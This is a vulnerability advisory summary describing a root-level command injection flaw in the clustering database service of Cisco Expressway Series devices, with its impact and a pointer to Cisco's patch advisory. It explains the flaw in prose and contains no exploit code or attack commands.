CVE-2026-76466
Overview
This vulnerability is a command injection flaw rooted in improper validation of persistent cookies and client certificates within the Cisco Expressway Series database service feature. The affected component is the database service used for clustering, where TLS Verify Mode is enabled but client certificates are insufficiently validated. This flaw allows unauthenticated remote access to execute arbitrary operating system commands with root privileges by exploiting remote procedure call (RPC) commands.
Vulnerability Description
A vulnerability in the database service feature of Cisco Expressway Series could allow an unauthenticated, remote attacker with network access to a Cisco Expressway device to execute arbitrary operating system commands as root. This vulnerability is due to the use of persistent cookies. Additionally, there is insufficient validation of client certificates when the TLS Verify Mode is set to Enabled for clustering, which means that client certificates are not validated. An attacker with possession of the cookies could exploit this vulnerability by connecting to the database service and invoking specific remote procedure call (RPC) commands. A successful exploit could allow the attacker to execute arbitrary commands as root on the underlying operating system of an affected device. Note: Cisco Expressway Series refers to Cisco Expressway Core (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.
Impact
An unauthenticated attacker with network access can leverage this vulnerability to execute arbitrary commands as root on the underlying operating system of affected Cisco Expressway devices. No user interaction or valid credentials are required to exploit the flaw. Successful exploitation results in full system compromise, enabling attackers to manipulate system processes, access sensitive data, and potentially disrupt video communication services or pivot within the network environment.
Solution
Cisco has released security updates addressing this vulnerability in Cisco TelePresence Video Communication Server (VCS) Expressway devices. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-vcs-static-cred-hr7EWZ8t. The advisory provides specific version updates and configuration guidance to remediate the issue. It is critical to follow Cisco’s instructions to update affected devices and verify TLS Verify Mode settings to ensure proper client certificate validation.
